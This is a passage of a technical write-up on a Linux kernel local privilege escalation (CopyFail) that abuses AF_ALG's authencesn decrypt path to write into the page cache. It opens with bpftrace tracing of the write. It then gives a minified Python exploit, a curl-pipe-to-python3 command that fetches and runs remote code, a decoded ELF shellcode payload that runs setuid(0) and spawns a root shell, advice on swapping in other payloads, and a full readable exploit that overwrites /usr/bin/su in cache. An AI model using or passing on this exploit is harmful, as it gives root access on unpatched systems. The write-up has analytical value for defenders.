sudo ./copyfail_poc
Observed probe output:
filemap_splice_read: ino=1587070 pos=0x1224 len=0x20 mapping=0xffff9f06d4964ca0 nrpages=3
splice_folio_into_pipe: pipe=0xffff9f06ea4ce3c0 folio=0xffffe57688cb1900 offset=0x1224 size=0x20
The first line confirms the live file splice window:
inode = 1587070
pos = 0x1224
len = 0x20
That matches the PoC layout:
splice_file_offset = 0x1224
splice_len = 0x20
The inode value comes from mapping->host, and the mapping value comes from in->f_mapping, so this line ties the splice operation back to the target file's page-cache address space.
Inside filemap_splice_read(), the selected cached folio is handed into the pipe through splice_folio_into_pipe():
n = splice_folio_into_pipe(pipe, folio, *ppos, n);
The second probe line confirms that handoff:
pipe = 0xffff9f06ea4ce3c0
folio = 0xffffe57688cb1900
offset = 0x1224
size = 0x20
This is the important transition:
target file
│
▼
file address_space mapping
│
▼
cached folio
│
▼
pipe buffer
So at this point, the target file bytes have not been copied into a private anonymous buffer. The pipe now carries a reference to the cached file folio selected by the splice window. This proves the first handoff in the exploit chain:
target.bin @ 0x1224, len 0x20
│
▼
page-cache folio
│
▼
pipe buffer reference
This keeps the probe focused on file → pipe only. The next probe covers the next handoff: pipe → socket / AF_ALG TX scatterlist.
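Comparing probe output against the expected splice window by eye is error-prone, so the check can be scripted. The sketch below assumes the exact printf formats used by the two probes in this section; parse_probe_line() and window_matches() are hypothetical helper names.

```python
import re


def parse_probe_line(line):
    """Split 'name: key=value ...' into (name, {key: int})."""
    name, _, rest = line.partition(":")
    fields = {}
    for key, val in re.findall(r"(\w+)=(0x[0-9a-fA-F]+|\d+)", rest):
        fields[key] = int(val, 0)  # base 0 accepts both decimal and 0x-hex
    return name.strip(), fields


def window_matches(read_line, pipe_line, splice_off, splice_len):
    """True if both probe lines describe the same expected splice window."""
    _, rd = parse_probe_line(read_line)
    _, pp = parse_probe_line(pipe_line)
    return (rd["pos"] == splice_off and rd["len"] == splice_len
            and pp["offset"] == splice_off and pp["size"] == splice_len)


READ_LINE = ("filemap_splice_read: ino=1587070 pos=0x1224 len=0x20 "
             "mapping=0xffff9f06d4964ca0 nrpages=3")
PIPE_LINE = ("splice_folio_into_pipe: pipe=0xffff9f06ea4ce3c0 "
             "folio=0xffffe57688cb1900 offset=0x1224 size=0x20")

print(window_matches(READ_LINE, PIPE_LINE, 0x1224, 0x20))  # True
```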
6.4 Inspect Pipe → AF_ALG
The next handoff is:
pipe-backed file page
│
▼
socket send path
│
▼
AF_ALG TX scatterlist
In splice_to_socket(), pipe-backed pages are wrapped into a socket message. The important part is that the message is marked as page-backed before it is sent into the socket layer:
msg.msg_flags = MSG_SPLICE_PAGES;
...
ret = sock_sendmsg(sock, &msg);
For an accepted AEAD operation socket, that sock_sendmsg() call reaches af_alg_sendmsg(). Inside that function, the exploit-relevant path is selected by MSG_SPLICE_PAGES:
if (msg->msg_flags & MSG_SPLICE_PAGES) {
    plen = extract_iter_to_sg(&msg->msg_iter, len, &sgtable, ...);
    ...
}
This is the conversion point:
pipe-backed socket message
│
▼
msg_iter marked MSG_SPLICE_PAGES
│
▼
extract_iter_to_sg()
│
▼
AF_ALG TX scatterlist
On this kernel, extract_iter_to_sg() is not directly traceable with kprobe. So instead, we probe the traceable AF_ALG entry point and inspect the incoming msghdr.
Run this in terminal A:
sudo bpftrace -e '
kprobe:af_alg_sendmsg /comm == "copyfail_poc"/
{
    $msg = (struct msghdr *)arg1;
    printf("af_alg_sendmsg: size=0x%lx msg_flags=0x%x\n",
        arg2, $msg->msg_flags);
}
'
Then run the PoC in terminal B:
sudo ./copyfail_poc
The probe records two calls into af_alg_sendmsg():
af_alg_sendmsg: size=0x8 msg_flags=0x8000
af_alg_sendmsg: size=0x20 msg_flags=0x8000000
They match the two inputs staged by the PoC:
| Call | Size | Flag | Meaning |
|---|---|---|---|
| normal sendmsg() | 0x8 | 0x8000 (MSG_MORE) | queues the 8-byte AAD: "AAAA" "PWN!" |
| splice(pipe -> AF_ALG) | 0x20 | 0x8000000 (MSG_SPLICE_PAGES) | queues the 32-byte file-backed splice window |
The first line is the AAD fragment:
size=0x8
AAD = "AAAA" || "PWN!"

The second line is the file-backed splice fragment:
size=0x20
target.bin[0x1224:0x1244]
= [0x10 ciphertext/filler][0x10 tag region]

The important flag is 0x8000000, which matches MSG_SPLICE_PAGES. That flag is set by splice_to_socket() before calling sock_sendmsg().
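The two flag values in the trace can be decoded mechanically. The sketch below is only an illustration: the KNOWN_FLAGS table and the decode_msg_flags() helper are hypothetical names, and the table lists just the two bits discussed here (0x8000, which the PoC passes as MSG_MORE, and 0x8000000, MSG_SPLICE_PAGES), not the kernel's full flag set.

```python
# Only the two bits seen in the bpftrace output; not an exhaustive MSG_* table.
KNOWN_FLAGS = {
    0x8000: "MSG_MORE",
    0x8000000: "MSG_SPLICE_PAGES",
}


def decode_msg_flags(flags: int) -> list[str]:
    """Return the names of known bits set in flags, plus any leftover bits as hex."""
    names = [name for bit, name in KNOWN_FLAGS.items() if flags & bit]
    known_mask = 0
    for bit in KNOWN_FLAGS:
        known_mask |= bit
    leftover = flags & ~known_mask
    if leftover:
        names.append(hex(leftover))
    return names


# The two (size, msg_flags) pairs recorded by the af_alg_sendmsg probe.
for size, flags in [(0x8, 0x8000), (0x20, 0x8000000)]:
    print(f"size={size:#x} msg_flags={flags:#x} -> {decode_msg_flags(flags)}")
```

Any bit outside the table is reported as raw hex, so an unexpected flag in a different trace would still be visible rather than silently dropped.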
So the live path is:
splice(file -> pipe)
│
▼
pipe buffer references file-backed page
│
▼
splice(pipe -> AF_ALG socket)
│
▼
splice_to_socket()
│
▼
sock_sendmsg(... MSG_SPLICE_PAGES ...)
│
▼
af_alg_sendmsg()
│
▼
MSG_SPLICE_PAGES branch
│
▼
extract_iter_to_sg()
│
▼
AF_ALG TX scatterlist

So this probe confirms the second handoff: the file-backed data is no longer only sitting behind a pipe buffer. It has entered the AF_ALG send path as a page-backed MSG_SPLICE_PAGES payload, ready to be imported into the AEAD TX scatterlist.
6.5 Inspect Authencesn Scratch Write
The final runtime pivot happens inside the selected AEAD implementation. By this point, the inputs are already staged:
- normal sendmsg(): AAD = "AAAA" || "PWN!"
- splice(pipe -> AF_ALG): 0x20-byte file-backed TX window → [0x10 ciphertext][0x10 tag]
Now recv() submits the prepared AEAD request. The generic crypto layer dispatches into crypto_authenc_esn_decrypt(), where the interesting write is:
scatterwalk_map_and_copy(
tmp + 1, // source: AAD[4:8]
dst, // target scatterlist
assoclen + cryptlen, // logical destination offset
4, // 4-byte write
1 // write flag: tmp+1 -> dst @ assoclen+cryptlen
);

For the lab layout:
assoclen = 0x8
req->cryptlen = 0x20 // ciphertext || tag
authsize = 0x10
effective cryptlen = 0x10 // after cryptlen -= authsize
scratch write offset = assoclen + effective cryptlen
= 0x8 + 0x10
= 0x18
write length = 4
write value = AAD[4:8] = "PWN!"

Attach this probe:
sudo bpftrace -e '
kprobe:crypto_authenc_esn_decrypt /comm == "copyfail_poc"/
{
$req = (struct aead_request *)arg0;
printf("authencesn_decrypt: assoclen=0x%x cryptlen=0x%x src=%p dst=%p expected_scratch_off=0x%x\n",
$req->assoclen, $req->cryptlen, $req->src, $req->dst,
$req->assoclen + $req->cryptlen - 0x10);
}
kprobe:scatterwalk_map_and_copy
/comm == "copyfail_poc" && arg2 == 0x18 && arg3 == 4 && arg4 == 1/
{
printf("scratch_write: sg=%p off=0x%lx len=%lu out=%lu value_le=0x%x\n",
arg1, arg2, arg3, arg4, *(uint32 *)arg0);
}
'

Result:

Observed:
authencesn_decrypt: assoclen=0x8 cryptlen=0x20 src=0xffff9f06ca980020 dst=0xffff9f06ca980020 expected_scratch_off=0x18
scratch_write: sg=0xffff9f06ca980020 off=0x18 len=4 out=1 value_le=0x214e5750

The first line confirms the request shape at the entry of crypto_authenc_esn_decrypt():
assoclen = 0x8
req->cryptlen = 0x20
src == dst = in-place request

At function entry, req->cryptlen still describes:
ciphertext || tag

So the probe computes the expected scratch-write offset by subtracting the configured tag size:
expected_scratch_off = assoclen + req->cryptlen - authsize
= 0x8 + 0x20 - 0x10
= 0x18

That matches the second probe line:
scratch_write: off=0x18 len=4 out=1

That boundary is the one used by the actual vulnerable operation:
scatterwalk_map_and_copy(
    void *buf = tmp + 1,          // source: tmp[1], which holds AAD[4:8]
    struct scatterlist *sg = dst, // 0xffff9f06ca980020
    unsigned int start = 0x18,    // logical destination offset within dst
    unsigned int nbytes = 4,      // write 4 bytes
    int out = 1                   // direction: copy from buf into the scatterlist
);

At the end, 0x214e5750 was written to the destination, which is exactly the string "PWN!" interpreted as a little-endian uint32_t:
50 57 4e 21 -> "PWN!"

This confirms the vulnerable operation itself: authencesn performs a destination-side 4-byte write at the boundary between the copied decrypt output and the chained tag tail. Because the tag tail came from the spliced file-backed pipe buffer, that write lands on the cached file page.
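The offset and value reported by the probe can be reproduced with a few lines of arithmetic. This is a minimal sketch using the lab values from this section; scratch_write_offset() is a hypothetical helper name, not a kernel function.

```python
import struct


def scratch_write_offset(assoclen: int, req_cryptlen: int, authsize: int) -> int:
    """Offset of the 4-byte write: assoclen + (cryptlen after the tag is subtracted)."""
    effective_cryptlen = req_cryptlen - authsize
    return assoclen + effective_cryptlen


# Lab layout: 8-byte AAD, 0x20 bytes of ciphertext || tag, 16-byte tag.
offset = scratch_write_offset(assoclen=0x8, req_cryptlen=0x20, authsize=0x10)

# value_le from the bpftrace line, re-encoded as the bytes that land in memory.
written = struct.pack("<I", 0x214E5750)

print(f"scratch write offset = {offset:#x}")
print(f"bytes written        = {written!r}")
```

Reading the uint32 back in little-endian byte order is what turns 0x214e5750 into the byte sequence 50 57 4e 21.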
The final userspace check closes the loop:
xxd -g1 -s 0x1220 -l 0x40 ./target.bin
sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches'
xxd -g1 -s 0x1220 -l 0x40 ./target.bin

Result as expected:

The final xxd output shows the same two-phase result established earlier by the PoC: before drop_caches, the normal file read observes PWN!; after drop_caches, rereading returns to ORIG. That closes the runtime chain from:
filemap_splice_read() → af_alg_sendmsg() → crypto_authenc_esn_decrypt()
In short, a 4-byte write lands in the page cache while the on-disk file remains unchanged.
7 Exploit Implementations
This chapter turns the page-cache overwrite primitive into full exploit implementations, with variants for different programming languages and Linux environments.
7.1 Official Release
7.1.1 732-byte Python Exploit
The officially released Python exploit is deliberately designed to be minimal:
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

It uses only the Python 3.10+ standard library (os, socket, zlib) and targets /usr/bin/su by default:
curl https://copy.fail/exp | python3 && su

Alternatively, an attacker can pass another setuid binary as argv[1]:
axura@pwnlab:~$ curl https://copy.fail/exp | python3 - passwd && su
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   731    0   731    0     0   2310      0 --:--:-- --:--:-- --:--:--  2305
# id
uid=0(root) gid=1000(axura) groups=1000(axura),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin)
7.1.2 Artifacts From Origin
Two encoded values in the original script are worth making explicit before the full listing.
7.1.2.1 ALG_SET_KEY: The authenc Key Blob
ALG_SET_KEY does not take a raw AES key here. For authencesn(hmac(sha256),cbc(aes)), the socket needs an authenc key blob, parsed by crypto_authenc_extractkeys(): an 8-byte rtattr (a 4-byte header plus the 4-byte crypto_authenc_key_param), followed by the concatenated HMAC key and AES key. In the released exploit, the encoded blob is:
08000100 00000010 00000000000000000000000000000000 00000000000000000000000000000000

Decoded:
authenc key blob
════════════════════════════════════════════════════════════
08 00 01 00 | 00 00 00 10 | 00 ... 00 | 00 ... 00
└─ rtattr ─┘ └ enckeylen ┘ └ auth key ┘ └ enc key ┘
rtattr:
rta_len = 8
rta_type = 1 // CRYPTO_AUTHENC_KEYA_PARAM
crypto_authenc_key_param:
enckeylen = 0x10
key material:
auth key = 16 zero bytes
enc key = 16 zero bytes
rtattr header = 4 bytes
key param = 4 bytes
auth key = 16 bytes
enc key = 16 bytes
────────────────────────────
total blob length = 40 bytes

The key split could be tuned, but the important field is enckeylen = 0x10. It tells the parser how to divide the remaining 40 - 8 = 32 bytes of key material:
- last 16 bytes: AES-CBC encryption key
- first 16 bytes: HMAC authentication key
So the kernel interprets the blob as:
┌────────────┬────────────┬───────────────┬─────────────┐
│ rtattr │ key param │ auth key │ enc key │
│ 4 bytes │ 4 bytes │ 16 bytes │ 16 bytes │
└────────────┴────────────┴───────────────┴─────────────┘

The keys do not need to be meaningful secrets for the primitive. Authentication is expected to fail. The key blob only needs to be structurally valid so the request reaches _aead_recvmsg() and then crypto_authenc_esn_decrypt(), where the 4-byte scratch write happens before recv() returns an error.
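The layout above can be checked by unpacking the blob by hand. The following is a rough sketch, not the kernel parser: parse_authenc_key_blob() is a hypothetical helper, the rtattr fields are read as little-endian 16-bit values (an assumption that holds on x86-64, where they are native-endian), and enckeylen is read as a big-endian 32-bit value, which is how 00 00 00 10 decodes to 0x10.

```python
import struct


def parse_authenc_key_blob(blob: bytes) -> dict:
    """Split an authenc key blob into its header fields and the two keys."""
    # rtattr header: rta_len and rta_type, native-endian (little-endian assumed here).
    rta_len, rta_type = struct.unpack_from("<HH", blob, 0)
    # crypto_authenc_key_param: a single big-endian 32-bit enckeylen.
    (enckeylen,) = struct.unpack_from(">I", blob, 4)

    key_material = blob[rta_len:]
    authkeylen = len(key_material) - enckeylen
    if authkeylen < 0:
        raise ValueError("enckeylen is larger than the remaining key material")

    return {
        "rta_len": rta_len,
        "rta_type": rta_type,
        "enckeylen": enckeylen,
        "auth_key": key_material[:authkeylen],  # first part: HMAC key
        "enc_key": key_material[authkeylen:],   # last enckeylen bytes: AES key
    }


# Same bytes as the blob in the released exploit: 8-byte header + 32 zero bytes.
blob = bytes.fromhex("0800010000000010" + "0" * 64)
fields = parse_authenc_key_blob(blob)

print(f"blob length = {len(blob)}")
print(f"rta_len={fields['rta_len']} rta_type={fields['rta_type']} "
      f"enckeylen={fields['enckeylen']:#x}")
print(f"auth key = {len(fields['auth_key'])} bytes, "
      f"enc key = {len(fields['enc_key'])} bytes")
```

The split is driven entirely by enckeylen: whatever remains after the last enckeylen bytes is treated as the authentication key.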
7.1.2.2 Zlib Payload Blob
On the other hand, the compressed payload blob is not arbitrary filler. It is the replacement byte stream that the exploit stages into the target executable 4 bytes at a time. Compression serves one practical purpose: keep the released one-file curl | python3 exploit short while preserving the exact byte sequence to be written.
In the original exploit, the runtime step is simply:
payload = zlib.decompress(payload_blob)

But after decoding the blob carefully, an important detail appears: the expanded payload is not bare shellcode. It is a tiny ELF64 executable stub.
The original hex blob is:
78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3

A direct decode shows:
import zlib
from pathlib import Path
blob = bytes.fromhex(
"78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07"
"e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5"
"190c0c0c0032c310d3"
)
payload = zlib.decompress(blob)
p = Path("payload.elf")
p.write_bytes(payload)
p.chmod(0o755)
print(f"[+] wrote {p}")
print(f"[+] len: {len(payload)}")
print(f"[+] first 16 bytes: {payload[:16].hex()}")

Output:
axura@pwnlab:~/lab/copy-fail$ python3 decode_blob.py
[+] wrote payload.elf
[+] len: 160
[+] first 16 bytes: 7f454c46020101000000000000000000
axura@pwnlab:~/lab/copy-fail$ file payload.elf
payload.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
Those first bytes are the ELF magic plus an ELF64 little-endian header:
7f 45 4c 46 02 01 01 00 ...
└── ELF ──┘  │  │  │  │
   magic     │  │  │  └─ OS ABI = System V
             │  │  └──── ELF version = 1
             │  └─────── little-endian
             └────────── ELFCLASS64

Parse the decoded payload.elf:
axura@pwnlab:~/lab/copy-fail$ readelf -h payload.elf
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0x400078
  Start of program headers:          64 (bytes into file)
  Start of section headers:          0 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         1
  Size of section headers:           0 (bytes)
  Number of section headers:         0
  Section header string table index: 0
axura@pwnlab:~/lab/copy-fail$ readelf -l payload.elf
Elf file type is EXEC (Executable file)
Entry point 0x400078
There is 1 program header, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000
                 0x000000000000009e 0x000000000000009e  R E    0x1000
The decompressed payload verifies cleanly:
ELF header
════════════════════════════════
len = 160 bytes
type = ET_EXEC
machine = x86_64
entry = 0x400078
program header table
════════════════════════════════
phoff = 0x40
phnum = 1
PT_LOAD segment
════════════════════════════════
off = 0x0
vaddr = 0x400000
flags = R|X
filesz = 0x9e
memsz = 0x9e

So the released exploit does not overwrite /usr/bin/su with naked shellcode at file offset 0. It overwrites the cached file beginning with a tiny ELF executable. That distinction matters because execve() still expects a valid executable image: ELF magic, program headers, and a loadable executable segment.
Since the only PT_LOAD segment maps file offset 0x0 at virtual address 0x400000, the entry point maps back to file offset:
entry_file_offset = 0x400078 - 0x400000
= 0x78

At file offset 0x78, the executable stub begins:
31c031ffb0690f05488d3d0f00000031f66a3b58990f0531ff6a3c580f052f62696e2f7368000000

Decoded as x86_64 instructions:
0x78: 31 c0 xor eax, eax
0x7a: 31 ff xor edi, edi
0x7c: b0 69 mov al, 0x69
0x7e: 0f 05 syscall ; setuid(0)
0x80: 48 8d 3d 0f 00 00 00 lea rdi, [rip+0xf] ; -> "/bin/sh"
0x87: 31 f6 xor esi, esi
0x89: 6a 3b push 0x3b
0x8b: 58 pop rax
0x8c: 99 cdq
0x8d: 0f 05 syscall ; execve("/bin/sh", NULL, NULL)
0x8f: 31 ff xor edi, edi
0x91: 6a 3c push 0x3c
0x93: 58 pop rax
0x94: 0f 05 syscall ; exit(0)
0x96: 2f 62 69 6e 2f 73 68 00 "/bin/sh\x00"
0x9e: 00 00 trailing bytes outside PT_LOAD

So the payload logic is:
setuid(0) -> execve("/bin/sh",0,0) -> exit(0)

In other words, the stub first calls setuid(0), then execve("/bin/sh", NULL, NULL), with the string "/bin/sh\x00" embedded directly after the code.
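The mapping from entry point to file offset can also be computed from the headers rather than read off by eye. The sketch below is an illustration under stated assumptions: instead of decompressing the real blob, build_sample_image() rebuilds just the 64-byte ELF header and the single 56-byte program header from the readelf values shown above, and both helper names are hypothetical.

```python
import struct

# ELF64 little-endian layouts (no padding): 64-byte file header, 56-byte program header.
EHDR = struct.Struct("<16sHHIQQQIHHHHHH")
PHDR = struct.Struct("<IIQQQQQQ")
PT_LOAD = 1


def build_sample_image() -> bytes:
    """Rebuild only the headers, using the field values reported by readelf."""
    e_ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)
    ehdr = EHDR.pack(e_ident, 2, 62, 1, 0x400078, 64, 0, 0, 64, 56, 1, 0, 0, 0)
    phdr = PHDR.pack(PT_LOAD, 5, 0x0, 0x400000, 0x400000, 0x9E, 0x9E, 0x1000)
    return ehdr + phdr


def entry_file_offset(image: bytes) -> int:
    """Translate e_entry into a file offset via the PT_LOAD segment that contains it."""
    eh = EHDR.unpack_from(image, 0)
    e_entry, e_phoff, e_phentsize, e_phnum = eh[4], eh[5], eh[9], eh[10]
    for i in range(e_phnum):
        p_type, _flags, p_offset, p_vaddr, _paddr, _filesz, p_memsz, _align = (
            PHDR.unpack_from(image, e_phoff + i * e_phentsize)
        )
        if p_type == PT_LOAD and p_vaddr <= e_entry < p_vaddr + p_memsz:
            return e_entry - p_vaddr + p_offset
    raise ValueError("entry point is not inside any PT_LOAD segment")


image = build_sample_image()
print(f"headers end at      {len(image):#x}")
print(f"entry file offset = {entry_file_offset(image):#x}")

# RIP-relative lea at 0x80 is 7 bytes long, so its target is 0x87 + 0xf.
print(f"lea target        = {0x80 + 7 + 0xF:#x}")
```

The headers occupy exactly 0x78 bytes, which is why the code begins immediately at that offset, and the lea target works out to 0x96, where the "/bin/sh" string sits in the disassembly.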
Conceptually:
zlib blob
│
│ decompress
▼
tiny ELF64 executable
│
├─ valid ELF header
├─ one executable PT_LOAD segment
├─ entry @ 0x400078
├─ code: setuid(0) -> execve("/bin/sh")
└─ embedded string: "/bin/sh\x00"

If an attacker wants a different staged payload, the generation step is still straightforward, but the payload must match the overwrite strategy.
For the released exploit style, where the overwrite begins at file offset 0 and the target is later launched through execve(), the decompressed bytes should form a valid executable image — for example, a tiny ELF carrier:
import zlib
from pathlib import Path
desired_payload = Path("payload.elf").read_bytes()
payload_blob = zlib.compress(desired_payload)
payload_blob_hex = payload_blob.hex()
print(payload_blob_hex)

The exploit-side decode remains:
payload = zlib.decompress(bytes.fromhex(payload_blob_hex))

So the zlib block is not part of the vulnerability mechanics. It is only a compact transport encoding for the bytes that will be planted into the cached executable page. The important constraint is what those bytes represent: if the overwrite starts at file offset 0, they must look like a valid executable image to the ELF loader, not just naked shellcode.
7.2 Full Python Script
The original 732-byte script is ideal for release, but it compresses too many exploit decisions into one line. A readable exploit version should keep the same primitive while making the overwrite layout, request setup, and iteration logic explicit:
- open an AF_ALG AEAD socket for authencesn(hmac(sha256),cbc(aes))
- encode the 4-byte write value into AAD[4:8]
- choose a splice length so the last 4 bytes of the imported file range are the bytes to overwrite
- trigger recv() even though authentication will fail
- repeat 4 bytes at a time until the full payload has been staged into page cache
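The per-iteration bookkeeping in that list is plain slicing arithmetic. As a small sketch with no kernel interaction, the hypothetical plan_chunks() helper below only enumerates, for a given byte string, each 4-byte slot, its file offset, and the matching window length (offset + 4); the demo input is placeholder data, not the real payload.

```python
def plan_chunks(data: bytes, width: int = 4) -> list[tuple[int, bytes, int]]:
    """Return (offset, chunk, window_len) for each width-byte slot of data."""
    plan = []
    for offset in range(0, len(data), width):
        chunk = data[offset:offset + width]
        window_len = offset + width  # window ends right after this slot
        plan.append((offset, chunk, window_len))
    return plan


# Placeholder bytes only: a 10-byte buffer, deliberately not a multiple of 4.
demo = bytes(range(10))
for offset, chunk, window_len in plan_chunks(demo):
    print(f"offset={offset:#04x} chunk={chunk.hex():<8} window_len={window_len:#x}")

# A 160-byte buffer, the length reported for the decompressed payload, needs 40 slots.
print(len(plan_chunks(bytes(160))))
```

Note that a length that is not a multiple of 4 leaves a short final chunk (2 bytes in the demo); the 160-byte payload discussed here divides evenly, so that case does not arise.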
The following version preserves the same strategy as the original PoC, but gives each exploit step a name, adds concise runtime logging, and keeps the control values visible:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Title : CopyFail CVE-2026-31431 Linux LPE exploit
# Date : 2026-05-15
# Author : Axura (@4xura) - https://4xura.com
#
# Description:
# ------------
# AAD[4:8] -> 4-byte controlled write value
# authsize = 4 -> target bytes sit in the imported tag tail
# splice len=t+4 -> the last 4 imported file bytes are the overwrite target
# recv() -> triggers authencesn() scratch write, even if auth fails
#
# Usage:
# ------
# python3 exploit.py
# DEBUG=1 python3 exploit.py [target_basename]
# python3 exploit.py [target_basename]
#
# Notes:
# ------
# Provided for educational purposes only. Use responsibly.
#
import os
import sys
import zlib
import socket
DEBUG = bool(os.getenv("DEBUG"))
def hex_bytes(s: str) -> bytes:
return bytes.fromhex(s)
SOL_ALG = 279
ALG_SET_KEY = 1
ALG_SET_IV = 2
ALG_SET_OP = 3
ALG_SET_AEAD_ASSOCLEN = 4
ALG_SET_AEAD_AUTHSIZE = 5
MSG_MORE = 0x8000
# authenc key blob:
# [rtattr|authenc param|16-byte auth key|16-byte AES key]
AUTHENC_KEY_BLOB = hex_bytes("0800010000000010" + "0" * 64)
def open_authencesn_socket() -> tuple[socket.socket, socket.socket]:
"""
Open the vulnerable AEAD transform and one accepted request socket.
userspace:
socket(AF_ALG) -> bind("aead", "authencesn(...)") -> accept()
kernel:
AF_ALG family -> algif_aead -> authencesn decrypt callback later on recv()
"""
tfm = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
tfm.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
tfm.setsockopt(SOL_ALG, ALG_SET_KEY, AUTHENC_KEY_BLOB)
tfm.setsockopt(SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, 4)
op, _ = tfm.accept()
return tfm, op
def queue_aad(op: socket.socket, write_value: bytes) -> None:
"""
Queue 8 bytes of AAD. Bytes 4..7 become the later 4-byte overwrite.
AAD layout:
byte 0..3 = filler
byte 4..7 = controlled value written later by authencesn()
+------+------+------+------+------+------+------+------+
| A | A | A | A | w0 | w1 | w2 | w3 |
+------+------+------+------+------+------+------+------+
"""
zero = hex_bytes("00")
aad = b"A" * 4 + write_value
# Control messages:
# ALG_SET_OP -> decrypt
# ALG_SET_IV -> 16-byte IV
# ALG_SET_AEAD_ASSOCLEN -> assoclen = 8
op.sendmsg(
[aad],
[
(SOL_ALG, ALG_SET_OP, zero * 4),
(SOL_ALG, ALG_SET_IV, b"\x10" + zero * 19),
(SOL_ALG, ALG_SET_AEAD_ASSOCLEN, b"\x08" + zero * 3),
],
MSG_MORE,
)
def splice_target_window(file_fd: int, op_fd: int, target_offset: int) -> None:
"""
Import the file window whose last 4 bytes are the overwrite target.
splice_len = target_offset + 4
so that the imported bytes are:
file[0 : target_offset] -> ciphertext region
file[target_offset : +4] -> preserved tag tail
authsize = 4 makes those last 4 bytes sit exactly where authencesn()
later performs its destination-side scratch write.
"""
splice_len = target_offset + 4
read_fd, write_fd = os.pipe()
try:
# file -> pipe
os.splice(file_fd, write_fd, splice_len, offset_src=0)
# pipe -> AF_ALG socket
os.splice(read_fd, op_fd, splice_len)
finally:
os.close(read_fd)
os.close(write_fd)
def trigger_decrypt(op: socket.socket, target_offset: int) -> None:
"""
Trigger the decrypt path.
The exploit does not require a successful decrypt. It only requires
authencesn() to execute far enough that:
scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1)
performs the 4-byte write before recv() reports authentication failure.
"""
try:
op.recv(8 + target_offset)
except OSError as e:
if DEBUG:
print(f" [-] recv() returned: {e}")
def overwrite_4_bytes(file_fd: int, target_offset: int, chunk: bytes) -> None:
"""
Apply one 4-byte overwrite primitive.
exploit geometry for one iteration:
AAD[4:8] = chunk
|
v
recv() -> authencesn() scratch write
|
v
file[target_offset : target_offset+4] in page cache becomes chunk
"""
tfm, op = open_authencesn_socket()
try:
if DEBUG:
print(
f"[+] overwrite @ 0x{target_offset:x}: "
f"{chunk.hex()} ({chunk.decode('latin1', errors='replace')})"
)
queue_aad(op, chunk)
splice_target_window(file_fd, op.fileno(), target_offset)
trigger_decrypt(op, target_offset)
finally:
op.close()
tfm.close()
def decompress_payload() -> bytes:
# zlib-compressed replacement bytes written into the target.
#
# After decompression:
# payload[0:4] -> overwrite at file offset 0x0
# payload[4:8] -> overwrite at file offset 0x4
# ...
#
# main() walks this buffer in 4-byte chunks and turns each chunk into one
# AAD[4:8] value for one exploit iteration.
payload_blob = hex_bytes(
"78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07"
"e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5"
"190c0c0c0032c310d3"
)
return zlib.decompress(payload_blob)
def main() -> None:
target = "/usr/bin/su"
if len(sys.argv) > 1:
target = f"/usr/bin/{sys.argv[1]}"
payload = decompress_payload()
print(f"[+] target : {target}")
print(f"[+] payload : {len(payload)} bytes")
print("[+] strategy : 4-byte writes via AAD[4:8] -> authencesn() scratch write")
file_fd = os.open(target, os.O_RDONLY)
try:
# Each loop iteration patches one 4-byte slot in the target executable.
for target_offset in range(0, len(payload), 4):
chunk = payload[target_offset : target_offset + 4]
overwrite_4_bytes(file_fd, target_offset, chunk)
finally:
os.close(file_fd)
print("[+] payload staged into page cache, executing target...")
os.system("su")
if __name__ == "__main__":
main()

So the full exploit has two encoded inputs:
- the AUTHENC_KEY_BLOB, which is the minimum valid authenc key package needed to instantiate authencesn(hmac(sha256),cbc(aes))
- the zlib-compressed payload blob, which expands into the replacement byte stream later written into the target setuid binary
This version now follows the exploit chain directly:
- open_authencesn_socket() selects the vulnerable AEAD implementation.
- queue_aad() places the controlled 4-byte value in AAD[4:8].
- splice_target_window() imports a file range whose last 4 bytes are the overwrite target.
- trigger_decrypt() forces crypto_authenc_esn_decrypt() to execute the scratch write.
- main() repeats that primitive until the full replacement payload has been staged into page cache.
